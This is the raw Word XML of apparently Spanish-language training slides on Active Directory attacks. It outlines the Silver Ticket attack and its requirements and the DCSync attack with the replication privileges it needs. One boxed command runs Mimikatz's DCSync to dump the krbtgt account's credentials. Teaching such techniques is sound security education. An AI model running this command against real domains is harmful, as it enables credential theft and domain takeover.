    <w:p w14:paraId="0B54BA57" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:spacing w:line="573" w:lineRule="exact"/>
        <w:ind w:left="795"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-&gt; Ataque de Boleto de Plata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7D402C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="71"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C13A409" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1874"/>
        </w:tabs>
        <w:ind w:left="1874" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El ticket Silver está firmado y encriptado con el hash de la cuenta de servicio de destino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1888D51F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5464D6CF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="115"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B91A727" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1874"/>
        </w:tabs>
        <w:ind w:left="1874" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Representa un TGS válido (para autorización)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC668D8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB112F8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="114"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6731682B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1874"/>
        </w:tabs>
        <w:ind w:left="1874" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Requisitos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D761CAD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6736F7A1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2594"/>
        </w:tabs>
        <w:ind w:left="2594" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>SID de dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C6D326" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2594"/>
        </w:tabs>
        <w:spacing w:before="50"/>
        <w:ind w:left="2594" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Hash de cuenta de servicio/cuenta de máquina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609F35B7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2594"/>
        </w:tabs>
        <w:spacing w:before="48"/>
        <w:ind w:left="2594" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Nombre de dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DC904F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2594"/>
        </w:tabs>
        <w:spacing w:before="50"/>
        <w:ind w:left="2594" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>SIDS (en ataques entre bosques)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669916F1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="720" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A11F924" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:spacing w:line="578" w:lineRule="exact"/>
        <w:ind w:left="707"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-&gt; Ataque DCSYNC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8F8889" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="121"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2375BAED" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1787"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1472"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Para extraer las credenciales de la cuenta de usuario de dominio/cuenta de servicio/cuenta de máquina sin ejecución de código en el controlador de dominio, el adversario utilizó el ataque DCSYNC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7690D0B0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA2F1CA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="147"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0222A3FC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1786"/>
        </w:tabs>
        <w:ind w:left="1786" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Se requiere un conjunto específico de privilegios para realizar la recuperación remota de hash sin ejecución de código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F9A69C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2507"/>
        </w:tabs>
        <w:spacing w:before="49"/>
        <w:ind w:left="2507" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>ReplicationChanges</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55795AA8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2507"/>
        </w:tabs>
        <w:spacing w:before="50"/>
        <w:ind w:left="2507" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>ReplicationChangesAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B97C168" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2507"/>
        </w:tabs>
        <w:spacing w:before="51"/>
        <w:ind w:left="2507" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Get-ReplicationChnages-in-a-filtered-set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E369ED" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="211"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A639D4F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1786"/>
        </w:tabs>
        <w:ind w:left="1786" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A96D56A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="234"/>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7648" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FA13DF5" wp14:editId="37D299C6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2513076</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>323939</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7696200" cy="573405"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="561" name="Text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573405"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4114F4C2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="175"/>
                              <w:ind w:left="42"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>invoke-mimikatz -command '"lsadump::d csync /user:cyberwarfare\krbtgt"'</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0FA13DF5" id="Textbox 561" o:spid="_x0000_s1289" type="#_x0000_t202" style="position:absolute;margin-left:197.9pt;margin-top:25.5pt;width:606pt;height:45.15pt;z-index:-15608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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4114F4C2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="175"/>
                        <w:ind w:left="42"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>invoke-mimikatz -command '"lsadump::d csync /user:cyberwarfare\krbtgt"'</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="578604B2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="540" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6EFB8D"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485436416" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25621C7E" wp14:editId="3FEBE644">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1754124</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>18283</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8684260" cy="6513830"/>
                <wp:effectExtent l="0" t="0" r="0"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4260" cy="6513830"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8684260" cy="6513830"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="563" name="Image 563"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId67" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8683750" cy="6513608"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="564" name="Image 564"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId287" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="2292349" y="191393"/>
                            <a:ext cx="4626301" cy="355346"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="565" name="Graphic 565"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2627375" y="2012191"/>
                            <a:ext cx="4767580" cy="2770505"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="4767580" h="2770505">
                                <a:moveTo>
                                  <a:pt x="3933825" y="2732024"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3921125" y="2725674"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3857625" y="2693924"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3857625" y="2725674"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2725674"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2738374"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3857625" y="2738374"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3857625" y="2770124"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3921125" y="2738374"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3933825" y="2732024"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="4767580" h="2770505">
                                <a:moveTo>
                                  <a:pt x="4767326" y="1407033"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4766818" y="1367777"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4766818" y="1367155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4765205" y="1328978"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4765167" y="1327785"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4762208" y="1289812"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4762119" y="1288669"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4757674" y="1249807"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4751717" y="1211618"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4744339" y="1173480"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4735195" y="1136015"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4724400" y="1098804"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4711827" y="1062228"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4697349" y="1026160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4680966" y="990473"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4662551" y="955421"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4642104" y="921004"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4619371" y="886968"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4594479" y="853694"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4567301" y="821055"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4537710" y="789051"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4505706" y="757682"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4471289" y="727075"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4434586" y="697103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4395597" y="667766"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4354576" y="638937"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4311396" y="610743"/>
                                </a:lnTo>
